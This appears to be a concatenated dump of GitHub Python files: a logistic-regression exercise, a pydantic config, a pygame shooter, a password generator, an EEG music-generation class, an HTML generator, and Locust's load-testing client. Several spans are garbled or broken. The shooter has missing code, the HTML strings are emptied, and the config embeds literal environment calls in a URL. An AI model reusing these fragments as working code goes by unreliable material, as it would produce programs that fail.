wj[1] * X_2.values[i][1]))\n y_predict_list.append(a)\n y_predict = np.array(y_predict_list)\n return y_predict\n\nroc_without_c = roc_auc_score(y, gradient_descent(X, y, C = 0.0))\nroc_with_c = roc_auc_score(y, gradient_descent(X, y, C = 10.0))\nprint(roc_without_c.round(3))\nprint(roc_with_c.round(3))\n\n\n\n\n\n\n\n\n","repo_name":"snowowwwl/Coursera_MLIntro_Yandex","sub_path":"W3_task3_logicregression/W3_task3_logicregression.py","file_name":"W3_task3_logicregression.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4692356181","text":"import os\nimport json\nfrom typing import Any, Union, List\n\nfrom pydantic import PostgresDsn, ValidationError, Field, validator, AnyHttpUrl\nfrom pydantic_settings import BaseSettings\n\nfrom src.constants import Environment\n\ncors_origin = os.environ.get(\"CORS_ORIGINS\", \"\").split(\",\")\nenv_name = os.environ.get(\"ENV_NAME\", \"PRODUCTION\")\n\nclass Config(BaseSettings):\n DATABASE_URL: PostgresDsn\n SITE_DOMAIN: str = \"myapp.com\"\n ENVIRONMENT: Environment = Environment[env_name]\n CORS_ORIGINS: Union[str, List[AnyHttpUrl]] = Field(..., env=\"CORS_ORIGINS\")\n CORS_HEADERS: list[str] = [\"*\"]\n APP_VERSION: str = \"1\"\n\n @validator(\"CORS_ORIGINS\", pre=True)\n def _assemble_cors_origins(cls, cors_origins):\n if isinstance(cors_origins, str):\n return [item.strip() for item in cors_origins.split(\",\")]\n return cors_origins\n\n# database = PostgresDsn(\n# scheme=\"postgresql\",\n# username=os.environ.get(\"DB_NAME\"),\n# password=os.environ.get(\"PASSWORD\"),\n# host=os.environ.get(\"HOST\"),\n# # path=cls.db,\n# )\ntry:\n settings = Config(\n DATABASE_URL='postgres://os.environ.get(\"DB_NAME\"):os.environ.get(\"PASSWORD\")@os.environ.get(\"HOST\"):5432'\n )\nexcept ValidationError as e:\n print(e)\n\n\napp_configs: dict[str, Any] = {\"title\": \"Twinkle API\", \"debug\": True}\nif settings.ENVIRONMENT.is_deployed:\n app_configs[\"root_path\"] = f\"/v{settings.APP_VERSION}\"\n\nif not settings.ENVIRONMENT.is_debug:\n app_configs[\"openapi_url\"] = None # hide docs\n","repo_name":"gbolly/colander","sub_path":"backend/src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16658584555","text":" # IMPORTS\nimport pygame\nimport random\nimport json\nimport sys\n ## IMPORTS\n\n # GAME SCREEN SIZE\npygame.init()\nscreen_w=1920 #1366\nscreen_h=1080 #768\n ## GAME SCREEN SIZE\n \n # COLORS\nblack=(0, 0 ,0)\nwhite=(222, 222, 222)\nred=(180, 0, 0)\nblue=(0, 60, 255)\n ## COLORS\n \n # SET WINDOW TO FULLSCREEN, SET TITLE AND CLOCK VARIABLE\nscreen=pygame.display.set_mode([screen_w,screen_h],pygame.FULLSCREEN)\npygame.display.set_caption('Flight Fighter')\nclock=pygame.time.Clock()\n ## SET WINDOW TO FULLSCREEN, SET TITLE AND CLOCK VARIABLE\n \n # SET FONT SIZE\narial_25 = pygame.font.SysFont('arial',28)\n ## SET FONT SIZE\n \n # SET ENEMY/SNOW EVENT TIMERS\nENEMYSPAWN = pygame.USEREVENT + 1\npygame.time.set_timer(ENEMYSPAWN, 550)\n ## SET ENEMY/SNOW EVENT TIMERS\nSNOWSPAWN = pygame.USEREVENT + 2\npygame.time.set_timer(SNOWSPAWN, 500)\n \n # INNERGAME BACKGROUND VARIABLES\nbg1 = pygame.image.load('./images/bg1.png').convert_alpha()\nbg1 = pygame.transform.scale(bg1,(screen_w,screen_h))\nbg2 = pygame.image.load('./images/bg2.png').convert_alpha()\nbg2 = pygame.transform.scale(bg2,(screen_w,screen_h))\n ## INNERGAME BACKGROUND VARIABLES\n \n # LOCATION VARIABLES\nb1x = b1y = 0\nb2x , b2y = 0,-screen_h\n ## LOCATION VARIABLES\n \n # SPLASH SCREEN VARIABLES\nop1 = pygame.image.load('./images/intro.png').convert_alpha()\nop2 = pygame.image.load('./images/me.png').convert_alpha()\nop3 = pygame.image.load('./images/fighters.png').convert_alpha()\n ## SPLASH SCREEN VARIABLES\n \n # SOUND VARIABLES\nstart_sound = pygame.mixer.Sound('./audio/Black Ops 2 - Adrenaline.mp3')\nstart_sound.set_volume(.3)\ngameMusic = pygame.mixer.Sound('./audio/Black Ops 2 - Adrenaline.mp3')\ngameMusic.set_volume(.3)\ngameeasy = pygame.mixer.Sound('./audio/Counter Strike Main Menu.mp3')\ngameeasy.set_volume(.7)\ngamehard = pygame.mixer.Sound('./audio/Boss Fight.mp3')\ngamehard.set_volume(.7)\ngameover_music = pygame.mixer.Sound('./audio/Counter Strike Main Menu.mp3')\ngameover_music.set_volume(.3)\nhaha = pygame.mixer.Sound('./audio/haha.wav')\nhaha.set_volume(.5)\nexpl_sound = pygame.mixer.Sound('./audio/expl.wav')\nexpl_sound.set_volume(.3)\nimpact_sound = pygame.mixer.Sound('./audio/thud.wav')\nimpact_sound.set_volume(.4)\npowerup = pygame.mixer.Sound('./audio/powerup.wav')\ngunshot = pygame.mixer.Sound('./audio/gunshot.wav')\ngunshot.set_volume(.4)\nbomb = pygame.mixer.Sound('./audio/bomb.wav')\nshotgun = pygame.mixer.Sound('./audio/shotgun.wav')\nshotgun.set_volume(.3)\n ## SOUND VARIABLES\n \n # SETS GAME TRACK (TRACKS GO FROM 1-10)\ngtrack = pygame.mixer.Channel(5)\n # SETS PRIMARY INNERGAME STARTING MUSIC TO 'SANDSTORM - DARUDE'\ngametrack = gameeasy\n \n # DEFAULT SOUND SETTINGS\nmuted = False\nmusic_change = True\n ## DEFAULT SOUND SETTINGS\n \n # SETS CLOUD VARIABLES\ncloud1=pygame.image.load('./images/cloud (1).png').convert_alpha()\ncloud2=pygame.image.load('./images/cloud (2).png').convert_alpha()\ncloud3=pygame.image.load('./images/cloud (3).png').convert_alpha()\ncloud4=pygame.image.load('./images/cloud (4).png').convert_alpha()\n ## SETS CLOUD VARIABLES\n \n # MORE LOCATION VARIABLES\nc1x,c1y = 0,-100\nc2x,c2y = 200,350\nc3x,c3y = 600,100\nc4x,c4y = 700,600\n ## MORE LOCATION VARIABLES\n \n # SETS PARTICLES TO SPRITE GROUPS\nall_snow = pygame.sprite.Group()\n\nall_sprites=pygame.sprite.Group()\n\nall_blocks=pygame.sprite.Group()\n\nall_bullets=pygame.sprite.Group()\n\nall_ebullets = pygame.sprite.Group()\n ## SETS PARTICLES TO SPRITE GROUPS\n\n ## HIGH SCORE\nHIGH_SCORE_FILE = \"high_score.json\"\n\ndef load_high_score():\n try:\n with open(HIGH_SCORE_FILE) as f:\n return json.load(f)\n except:\n return 0\n \ndef save_high_score(score):\n with open(HIGH_SCORE_FILE, \"w\") as f:\n json.dump(score, f)\n ## HIGH SCORE\n \n # UPGRADE ANIMATION\nupgrade_anim = []\nfor i in range(1,10):\n filename = './images/Picture{}.png'.format(i)\n img = pygame.image.load(filename).convert()\n img.set_colorkey(black)\n img = pygame.transform.scale(img,(135,135))\n upgrade_anim.append(img)\n\nclass Upgrade_anim(pygame.sprite.Sprite):\n def __init__(self,center):\n pygame.sprite.Sprite.__init__(self)\n self.image = upgrade_anim[0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.last_update = pygame.time.get_ticks()\n self.frame_rate = 50\n ## UPGRADE ANIMATION\n \n # UPGRADE SYNC ?\n def update(self):\n self.rect.center = player.rect.center\n now = pygame.time.get_ticks()\n if now - self.last_update > self.frame_rate:\n self.last_update = now\n self.frame +=1\n if self.frame == len(upgrade_anim):\n self.kill()\n else:\n center = self.rect.center\n self.image = upgrade_anim[self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n ## UPGRADE SYNC ?\n \n # EXPLOSION ANIMATION SIZES\nexplosion_anim = {}\nexplosion_anim['lg'] = []\nexplosion_anim['sm'] = []\nexplosion_anim['Xlg'] = []\n ## EXPLOSION ANIMATION SIZES\n \n # EXPLOSION ANIM\nfor i in range(9):\n filename = './images/regularExplosion0{}.png'.format(i)\n img = pygame.image.load(filename).convert()\n img.set_colorkey(black)\n img_Xlg = pygame.transform.scale(img, (210,210))\n explosion_anim['Xlg'].append(img_Xlg)\n img_lg = pygame.transform.scale(img, (95, 95))\n explosion_anim['lg'].append(img_lg)\n img_sm = pygame.transform.scale(img, (32, 32))\n explosion_anim['sm'].append(img_sm)\n ## EXPLOSION ANIM\n \n # EXPLOSION SIZE AND LOCATION\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, center, size):\n pygame.sprite.Sprite.__init__(self)\n self.size = size\n self.image = explosion_anim[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.last_update = pygame.time.get_ticks()\n self.frame_rate = 50\n ## EXPLOSION SIZE AND LOCATION\n \n # EXPLOSION SYNC ?\n def update(self):\n now = pygame.time.get_ticks()\n if now - self.last_update > self.frame_rate:\n self.last_update = now\n self.frame += 1\n if self.frame == len(explosion_anim[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = explosion_anim[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n ## EXPLOSION SYNC ?\n \n # SPRITE BLOCK STUFF \nclass Block(pygame.sprite.Sprite):\n def __init__(self,hp,speed):\n super().__init__()\n self.image = pygame.image.load('./images/e_jet.png').convert_alpha()\n self.rect=self.image.get_rect()\n self.radius = (self.rect.centerx - self.rect.x)\n self.hp= hp\n self.speed = speed\n self.birth = pygame.time.get_ticks()\n self.shoot = 1400\n\n # SPRITE BLOCKS SYNC\n def update(self):\n self.rect.move_ip(0,self.speed)\n if self.rect.top>screen_h:\n self.kill()\n if pygame.time.get_ticks() - self.birth > self.shoot:\n if not muted: shotgun.play()\n ebullet = Bullet(1,15,'ejet')\n ebullet.rect.centerx=self.rect.centerx\n ebullet.rect.centery=self.rect.centery\n all_ebullets.add(ebullet)\n all_sprites.add(ebullet)\n self.birth = pygame.time.get_ticks()\n\n # CLASS FOR SNOW IN MENU\nclass Snow(pygame.sprite.Sprite):\n def __init__(self):\n super().__init__()\n self.image = pygame.image.load('./images/snow.png').convert_alpha()\n self.rect = self.image.get_rect()\n self.speedy = random.randrange(1,5)\n self.speedx = random.randrange(-2,2)\n \n # SNOW SPRITE SYNC\n def update(self):\n self.rect.centery += self.speedy\n self.rect.centerx += self.speedx\n if self.rect.right>screen_w or self.rect.left<0 or self.rect.bottom>screen_h:\n self.kill()\n \n # PLAYER SPRITE CLASS\nclass Player(pygame.sprite.Sprite):\n def __init__(self,hp):\n super().__init__()\n self.image = pygame.image.load('./images/jet.png').convert_alpha()\n self.rect=self.image.get_rect()\n self.radius = (self.rect.centerx - self.rect.x)\n self.hp = hp\n self.speed = 8\n self.shoot_delay = 95\n self.last_shot = pygame.time.get_ticks()\n self.machinegun = False\n \n # PLAYER SPRITE SYNC\n def update(self):\n key = pygame.mouse.get_pressed()\n mouse_pos=pygame.mouse.get_pos()\n \n self.rect.centerx=mouse_pos[0]\n self.rect.centery=mouse_pos[1]\n\n # MACHINE GUN LMAO\n if self.machinegun:\n if key[0] == 1:\n if pygame.time.get_ticks() - self.last_shot > self.shoot_delay:\n if not muted:\n gunshot.play()\n self.last_shot = pygame.time.get_ticks()\n bullet=Bullet(-1,50,'jet')\n bullet.rect.centerx=player.rect.centerx\n bullet.rect.centery=player.rect.centery\n all_sprites.add(bullet)\n all_bullets.add(bullet) \n\n # BULLET SPRITE CLASS\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self,direction,speed,btype):\n super().__init__()\n self.type = btype\n if self.type == 'jet':\n if player.machinegun:\n self.image = pygame.image.load('./images/bullet2.png').convert_alpha()\n else:\n self.image=pygame.image.load('./images/bullet.png').convert_alpha()\n if self.type == 'ejet':\n self.image = pygame.image.load('./images/ebullet.png').convert_alpha()\n self.rect=self.image.get_rect()\n self.direction = direction\n self.speed = speed\n \n # BULLET SPRITE SYNC\n def update(self):\n self.rect.y+=(self.direction)*self.speed\n if self.rect.bottom<0:\n self.kill()\n if self.rect.top>screen_h:\n self.kill()\n\n # CLASS FOR IMAGES\nclass Image(pygame.sprite.Sprite):\n def __init__(self,image,center):\n super().__init__()\n self.image = image.convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.center = center\n\nplayer=Player(6)\nall_sprites.add(player)\nscore = 0\nblockspeed1 = 3\nblockspeed2 = 6\nbarHP = 3\nupgrade = 0\nincrement = 10\n\n # CLASS FOR BUTTON FUNCTIONALITY\ndef button(msg,x,y,w,h,ap,ic,ac,action = None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n if x+w>mouse[0]>x and y+h>mouse[1]>y:\n pygame.draw.rect(screen,ac,(x-ap,y-ap,w+2*ap,h+2*ap))\n if click[0] == 1 and action != None:\n action()\n \n else:\n pygame.draw.rect(screen,ic,(x,y,w,h))\n txt = arial_25.render(msg,True,white)\n txt_rect = txt.get_rect()\n txt_rect.center = ((x+w/2),(y+h/2))\n screen.blit(txt,txt_rect)\n\n # MUTE/UNMUTE FUNCTION\ndef mute():\n global muted\n pygame.mixer.pause() # pause\n muted = True\ndef unmute():\n global muted\n pygame.mixer.unpause() # unpause\n muted = False\n\n # SPLASH SCREEN FUNCTION\ndef op():\n start = pygame.time.get_ticks()\n cinematic = True\n if not muted: start_sound.play(-1)\n while cinematic:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if pygame.time.get_ticks()-start<6500:\n screen.blit(op1,(0,0))\n elif 6500 score >= 10:\n block.image = pygame.image.load('./images/e_jet2.png').convert_alpha()\n block.rect = block.image.get_rect()\n block.radius = (block.rect.centerx - block.rect.x)\n block.hp = 5\n \n if 80 > score >= 40:\n expl_large = True\n block.image = pygame.image.load('./images/e_jet3.png').convert_alpha()\n block.rect = block.image.get_rect()\n block.radius = (block.rect.centerx - block.rect.x)-55\n block.hp = 10 \n block.speed = random.randint(3,6)\n pygame.time.set_timer(ENEMYSPAWN,1500)\n block.shoot = 800\n \n if score >= 80:\n if music_change:\n pygame.mixer.fadeout(1000)\n if not muted:\n haha.play()\n gametrack = gamehard\n gtrack.play(gametrack)\n music_change = False\n expl_large = True\n block.image = pygame.image.load('./images/e_jet4.png').convert_alpha()\n block.rect = block.image.get_rect()\n block.radius = (block.rect.centerx - block.rect.x)-55\n block.hp = 10 \n block.speed = random.randint(3,6)\n pygame.time.set_timer(ENEMYSPAWN,1500)\n block.shoot = 710\n\n block.rect.centerx = random.randrange(screen_w)\n block.rect.centery = random.randint(-140,-90)\n all_blocks.add(block)\n all_sprites.add(block)\n \n elif event.type==pygame.MOUSEBUTTONDOWN and event.button == 1 and not player.machinegun:\n if not muted: gunshot.play()\n bullet=Bullet(-1,50,'jet')\n bullet.rect.centerx=player.rect.centerx\n bullet.rect.centery=player.rect.centery\n all_sprites.add(bullet)\n all_bullets.add(bullet)\n\n all_sprites.update()\n \n # BULLET CONTACT HANDLING \n for bullet in all_bullets:\n block_hit_list=pygame.sprite.spritecollide(bullet,all_blocks,False,pygame.sprite.collide_circle)\n for block in block_hit_list:\n if not muted: impact_sound.play()\n expl = Explosion(bullet.rect.center,'sm')\n all_sprites.add(expl)\n block.hp -= 1\n bullet.kill()\n if block.hp<=0:\n pygame.sprite.spritecollide(bullet, all_blocks, True)\n if not muted: expl_sound.play()\n if expl_large:\n expl = Explosion(block.rect.center,'Xlg')\n else:\n expl = Explosion(block.rect.center,'lg')\n all_sprites.add(expl)\n bullet.kill()\n if expl_large: score +=2\n else: score+=1\n\n for ebullet in all_ebullets:\n ebullet_hit_list = pygame.sprite.spritecollide(player,all_ebullets,False,pygame.sprite.collide_circle)\n for ebullet in ebullet_hit_list:\n if not muted: impact_sound.play()\n expl = Explosion(player.rect.center,'sm')\n all_sprites.add(expl)\n player.hp -= 1\n ebullet.kill()\n if player.hp <= 0:\n if not muted: bomb.play()\n interval = 200\n expl = Explosion(player.rect.center,'lg')\n all_sprites.add(expl)\n timi = pygame.time.get_ticks()\n kill = True\n\n for bullet in all_bullets:\n bullet_ebullet_hits = pygame.sprite.spritecollide(bullet,all_ebullets,True)\n for bullet in bullet_ebullet_hits:\n expl = Explosion(bullet.rect.center,'sm')\n all_sprites.add(expl)\n bullet.kill()\n\n for blocks in all_blocks:\n jet_block_hit = pygame.sprite.spritecollide(player,all_blocks,True,pygame.sprite.collide_circle)\n for block in jet_block_hit:\n if not muted: expl_sound.play()\n if expl_large: expl = Explosion(block.rect.center,'Xlg')\n else: expl = Explosion(block.rect.center,'lg')\n all_sprites.add(expl)\n if expl_large:\n player.hp -= 2\n else:\n player.hp -= 1\n if player.hp <= 0:\n if not muted: bomb.play()\n interval = 200\n expl = Explosion(player.rect.center,'lg')\n all_sprites.add(expl)\n timi = pygame.time.get_ticks()\n kill = True\n \n\n # KILL FUNCTION\n if kill == True:\n \n if pygame.time.get_ticks() - timi > interval:\n expl = Explosion(player.rect.center,'lg')\n all_sprites.add(expl)\n interval += 200\n \n if pygame.time.get_ticks() - timi > 1000:\n kill = False\n player.kill()\n crash = True\n pygame.mouse.set_visible(1)\n gameover()\n\n screen.blit(bg1,(b1x,b1y))\n screen.blit(bg2,(b2x,b2y))\n\n b1y += 2\n b2y += 2\n \n if b1y > screen_h : b1y = -screen_h\n if b2y > screen_h : b2y = -screen_h\n\n screen.blit(cloud1,(c1x,c1y))\n screen.blit(cloud2,(c2x,c2y))\n screen.blit(cloud3,(c3x,c3y))\n screen.blit(cloud4,(c4x,c4y))\n\n c1x+=1\n c2x+=3\n c3x+=4\n c4x+=2\n\n if c1x>screen_w+10: c1x = -700 \n if c2x>screen_w+10: c2x = -700\n if c3x>screen_w+10: c3x = -700\n if c4x>screen_w+10: c4x = -700\n \n \n all_snow.draw(screen) \n all_sprites.draw(screen)\n\n\n # HP BAR \n if g_start:\n if not barHP>=player.hp*67:\n barHP += 7\n else:\n g_start = False\n else:\n if not barHP<=player.hp*67:\n barHP -= 5\n if not barHP>player.hp*67:\n barHP += 5\n if player.hp<=2:\n hp_color = red\n if barHP<=3:\n barHP = 3\n pygame.draw.rect(screen,hp_color,(10,10,barHP,10))\n hp_surf = arial_25.render('Health',True,white)\n screen.blit(hp_surf,(10,25))\n\n # SCORE INGAME\n s_surf = arial_25.render(\"Score: \"+str(score),True,white)\n screen.blit(s_surf,(10,60))\n s_surf = arial_25.render(\"High Score: \"+str(high_score),True,white)\n screen.blit(s_surf,(10,95))\n\n if score > high_score:\n high_score = score\n save_high_score(high_score)\n\n if up:\n if smg_not:\n upg_images.add(smg)\n if pygame.time.get_ticks()-timer < 2420:\n hp_color = (191,191,191)\n upg_images.draw(screen)\n else:\n hp_color = blue\n up = False\n smg_not = False\n upg_images.remove(smg)\n \n clock.tick(60)\n pygame.display.update()\n pygame.mouse.set_visible(1)\nop()\nmenu()\n\npygame.quit()\n","repo_name":"Svxy/Flight-Fighters","sub_path":"fighters.py","file_name":"fighters.py","file_ext":"py","file_size_in_byte":30964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"31201536938","text":"#!/usr/bin/python3\n\nfrom string import ascii_lowercase,ascii_uppercase\nfrom random import shuffle,choices\nfrom os import system\n\nsystem(\"clear\"),print(\"\"\"##### Simple and Powerful Password Generator #####\n\t ## By: Abd Almoen Arafa ##\n\t ## Age: 15 \t ##\\n\"\"\")\n\ndef content():\n\tl_l,l_u,nums,syms=ascii_lowercase,ascii_uppercase,\"0123456789\",\"!@#$%^&*()_+-=[]{};:'|\\/,.<>?\"\n\tlist=[l_l,l_u,nums,syms]\n\tshuffle(list)\n\tall=list[0]+list[1]+list[2]+list[3]\n\ttry:\n\t\task=int(input(\"How many elements: \"))\n\t\tprint(\"\\n\",\"\\t\"*3,\"#\"*31,\"\\n\")\n\t\tran=choices(all,k=ask)\n\t\tList=\"\".join(ran)\n\t\tprint(List),print(\"\\n\",\"\\t\"*3,\"#\"*31,\"\\n\")\n\texcept ValueError:\tprint(\"Sorry,You have to write just a numbers here\\n\"),content()\n\texcept KeyboardInterrupt:\tprint(\"\\nBye ;)\\n\")\n\ncontent()\n#By Abd Almoen Arafa\n#I'm 15 years old\n","repo_name":"0Arafa/0.1ArafaPassGen","sub_path":"0.1ArafaPassGen.py","file_name":"0.1ArafaPassGen.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15018096036","text":"import torch\nimport torchaudio\nfrom transformers import AutoModel\nimport torchaudio.transforms as T\nimport numpy as np\nimport pandas as pd\n\nclass MusicGenerator:\n def __init__(self, mert_model_path, eeg_model_path, music_gen_model_path, feature_extractor, resample_rate):\n self.mert_model = AutoModel.from_pretrained(mert_model_path, trust_remote_code=True)\n self.eeg_model = AutoModel.from_pretrained(eeg_model_path, trust_remote_code=True)\n self.music_gen_model = AutoModel.from_pretrained(music_gen_model_path, trust_remote_code=True)\n self.feature_extractor = feature_extractor\n self.resample_rate = resample_rate\n self.aggregator = torch.nn.Conv1d(in_channels=13, out_channels=1, kernel_size=1)\n self.data_sheet = pd.DataFrame()\n\n def preprocess_audio(self, audio_path):\n waveform, sampling_rate = torchaudio.load(audio_path)\n if sampling_rate != self.resample_rate:\n resampler = T.Resample(sampling_rate, self.resample_rate)\n waveform = resampler(waveform)\n return waveform\n\n def analyze_music(self, audio_waveform):\n inputs = self.feature_extractor(audio_waveform, sampling_rate=self.resample_rate, return_tensors=\"pt\")\n with torch.no_grad():\n outputs = self.mert_model(**inputs, output_hidden_states=True)\n return outputs\n\n def extract_features(self, audio_waveform, eeg_data):\n # Analyze music\n music_outputs = self.analyze_music(audio_waveform)\n\n # EEG Model predictions\n eeg_outputs = self.eeg_model(eeg_data) # Implement EEG model prediction\n\n # Combine features\n combined_features = self.combine_features(music_outputs, eeg_outputs)\n return combined_features\n\n def combine_features(self, music_outputs, eeg_outputs):\n # Extract relevant information from music outputs\n music_features = music_outputs.last_hidden_state.mean(dim=1) # Example aggregation\n\n # EEG outputs processing\n eeg_features = eeg_outputs.last_hidden_state.mean(dim=1) # Example aggregation\n\n # Combine features with appropriate weighting and normalization\n combined_features = torch.cat((music_features, eeg_features), dim=1)\n combined_features = self.normalize_features(combined_features)\n\n return combined_features\n\n def normalize_features(self, features):\n # Normalize features for consistency\n return (features - features.mean(dim=0)) / (features.std(dim=0) + 1e-5)\n\n def generate_music(self, combined_features):\n # Transform features for music generation model input\n input_for_generation = self.prepare_input_for_generation(combined_features)\n\n # Generate music using the model\n with torch.no_grad():\n generated_music = self.music_gen_model.generate(input_for_generation)\n\n return generated_music\n\n def prepare_input_for_generation(self, combined_features):\n # Prepare and transform the combined features for the music generation model\n # This may involve specific transformations based on the model's requirements\n return combined_features # Placeholder\n\n def continuous_learning_cycle(self, audio_path, eeg_data):\n # Preprocess audio\n audio_waveform = self.preprocess_audio(audio_path)\n\n # Feature extraction\n combined_features = self.extract_features(audio_waveform, eeg_data)\n\n # Generate music\n generated_music = self.generate_music(combined_features)\n\n # Update data sheet\n self.update_data_sheet(combined_features)\n\n return generated_music\n\n def update_data_sheet(self, features):\n # Update the data sheet with new features for continuous learning\n self.data_sheet = self.data_sheet.append(features, ignore_index=True)\n\n# Example usage\nfeature_extractor = None # Define or load your feature extractor\nmusic_gen = MusicGenerator(\"path_to_mert_model\", \"path_to_eeg_model\", \"path_to_music_gen_model\", feature_extractor, 24000)\ngenerated_music = music_gen.continuous_learning_cycle(\"path_to_audio.wav\", eeg_data)","repo_name":"HawkSP/DedAI","sub_path":"Music_Recommendation_and_Generation/music_generator.py","file_name":"music_generator.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39105173884","text":"import sys\nimport os\nsys.setrecursionlimit(2500)\n\nfilename = 'input'\n\nwith open(filename, 'r') as f:\n content = [x.strip() for x in f.readlines()]\n\ncommands = [(x.split(' ')[0], int(x.split(' ')[1])) for x in content]\n\nthe_divs = {\n 'forward': [],\n 'up': [],\n 'down': []\n}\nfor command, distance in commands:\n the_divs[command].append(f'
    ')\n\nwith open('index-template.html', 'r') as f:\n content = f.read()\n\nkeys = the_divs.keys()\nfor key in keys:\n inner_divs = '\\n'.join(the_divs[key])\n full_div = f'
    {inner_divs}
    '\n the_divs[key] = full_div\n\ndive_div = the_divs['forward'] + '\\n' + the_divs['down']\nsurface_div = the_divs['forward'] + '\\n' + the_divs['up']\nupdated_content = content.replace('[[DIVE-DATA]]', dive_div)\nupdated_content = updated_content.replace('[[SURFACE-DATA]]', surface_div)\n\nwith open('index.html', 'w') as f:\n f.write(updated_content)\n\ngenerated_css = []\n\nwith open('helper-vars.css', 'w') as f:\n for idx in range(0, 100):\n print('div[data-distance=\"{idx}\"] {{ --distance: {idx}px; --distance-as-string: \"{idx}\" }}'.format(idx=idx), file=f)\n","repo_name":"CatEars/advent-of-code-but-with-html-css-and-svg","sub_path":"2/html-css/generate-data.py","file_name":"generate-data.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11822819822","text":"from __future__ import absolute_import\n\nimport chardet\nimport re\nimport six\nimport socket\nfrom base64 import b64encode\nfrom six.moves.urllib.parse import urlparse, urlunparse\nfrom ssl import SSLError\nfrom timeit import default_timer\n\nif six.PY2:\n from cookielib import CookieJar\n class ConnectionRefusedError(Exception):\n # ConnectionRefusedError doesn't exist in python 2, so we'll \n # define a dummy class to avoid a NameError\n pass\nelse:\n from http.cookiejar import CookieJar\n unicode = str\n\nfrom gevent.timeout import Timeout\nfrom geventhttpclient.useragent import UserAgent, CompatRequest, CompatResponse, ConnectionError\nfrom geventhttpclient.response import HTTPConnectionClosed\n\nfrom locust import events\nfrom locust.core import Locust\nfrom locust.exception import LocustError, CatchResponseError, ResponseError\n\n\n# Monkey patch geventhttpclient.useragent.CompatRequest so that Cookiejar works with Python >= 3.3\n# More info: https://github.com/requests/requests/pull/871\nCompatRequest.unverifiable = False\n\n# Regexp for checking if an absolute URL was specified\nabsolute_http_url_regexp = re.compile(r\"^https?://\", re.I)\n\n# List of exceptions that can be raised by geventhttpclient when sending an HTTP request, \n# and that should result in a Locust failure\nFAILURE_EXCEPTIONS = (ConnectionError, ConnectionRefusedError, socket.error, \\\n SSLError, Timeout, HTTPConnectionClosed)\n\n\ndef _construct_basic_auth_str(username, password):\n \"\"\"Construct Authorization header value to be used in HTTP Basic Auth\"\"\"\n if isinstance(username, str):\n username = username.encode('latin1')\n if isinstance(password, str):\n password = password.encode('latin1')\n return 'Basic ' + b64encode(b':'.join((username, password))).strip().decode(\"ascii\")\n\n\nclass FastHttpLocust(Locust):\n \"\"\"\n Represents an HTTP \"user\" which is to be hatched and attack the system that is to be load tested.\n \n The behaviour of this user is defined by the task_set attribute, which should point to a \n :py:class:`TaskSet ` class.\n \n This class creates a *client* attribute on instantiation which is an HTTP client with support \n for keeping a user session between requests.\n \"\"\"\n \n client = None\n \"\"\"\n Instance of HttpSession that is created upon instantiation of Locust. \n The client support cookies, and therefore keeps the session between HTTP requests.\n \"\"\"\n \n def __init__(self):\n super(FastHttpLocust, self).__init__()\n if self.host is None:\n raise LocustError(\"You must specify the base host. Either in the host attribute in the Locust class, or on the command line using the --host option.\")\n if not re.match(r\"^https?://[^/]+$\", self.host, re.I):\n raise LocustError(\"Invalid host (`%s`). The specified host string must be a base URL without a trailing slash. E.g. http://example.org\" % self.host)\n \n self.client = FastHttpSession(base_url=self.host)\n\n\nclass FastHttpSession(object):\n auth_header = None\n \n def __init__(self, base_url, **kwargs):\n self.base_url = base_url\n self.cookiejar = CookieJar()\n self.client = LocustUserAgent(max_retries=1, cookiejar=self.cookiejar, **kwargs)\n \n # Check for basic authentication\n parsed_url = urlparse(self.base_url)\n if parsed_url.username and parsed_url.password:\n netloc = parsed_url.hostname\n if parsed_url.port:\n netloc += \":%d\" % parsed_url.port\n \n # remove username and password from the base_url\n self.base_url = urlunparse((parsed_url.scheme, netloc, parsed_url.path, parsed_url.params, parsed_url.query, parsed_url.fragment))\n # store authentication header (we construct this by using _basic_auth_str() function from requests.auth)\n self.auth_header = _construct_basic_auth_str(parsed_url.username, parsed_url.password)\n \n def _build_url(self, path):\n \"\"\" prepend url with hostname unless it's already an absolute URL \"\"\"\n if absolute_http_url_regexp.match(path):\n return path\n else:\n return \"%s%s\" % (self.base_url, path)\n \n def _send_request_safe_mode(self, method, url, **kwargs):\n \"\"\"\n Send an HTTP request, and catch any exception that might occur due to either \n connection problems, or invalid HTTP status codes\n \"\"\"\n try:\n return self.client.urlopen(url, method=method, **kwargs)\n except FAILURE_EXCEPTIONS as e:\n if hasattr(e, \"response\"):\n r = e.response\n else:\n r = ErrorResponse()\n r.error = e\n return r\n \n def request(self, method, path, name=None, data=None, catch_response=False, stream=False, \\\n headers=None, auth=None, **kwargs):\n \"\"\"\n Send and HTTP request\n Returns :py:class:`locust.contrib.fasthttp.FastResponse` object.\n\n :param method: method for the new :class:`Request` object.\n :param path: Path that will be concatenated with the base host URL that has been specified.\n Can also be a full URL, in which case the full URL will be requested, and the base host \n is ignored.\n :param name: (optional) An argument that can be specified to use as label in Locust's \n statistics instead of the URL path. This can be used to group different URL's \n that are requested into a single entry in Locust's statistics.\n :param catch_response: (optional) Boolean argument that, if set, can be used to make a request \n return a context manager to work as argument to a with statement. This will allow the \n request to be marked as a fail based on the content of the response, even if the 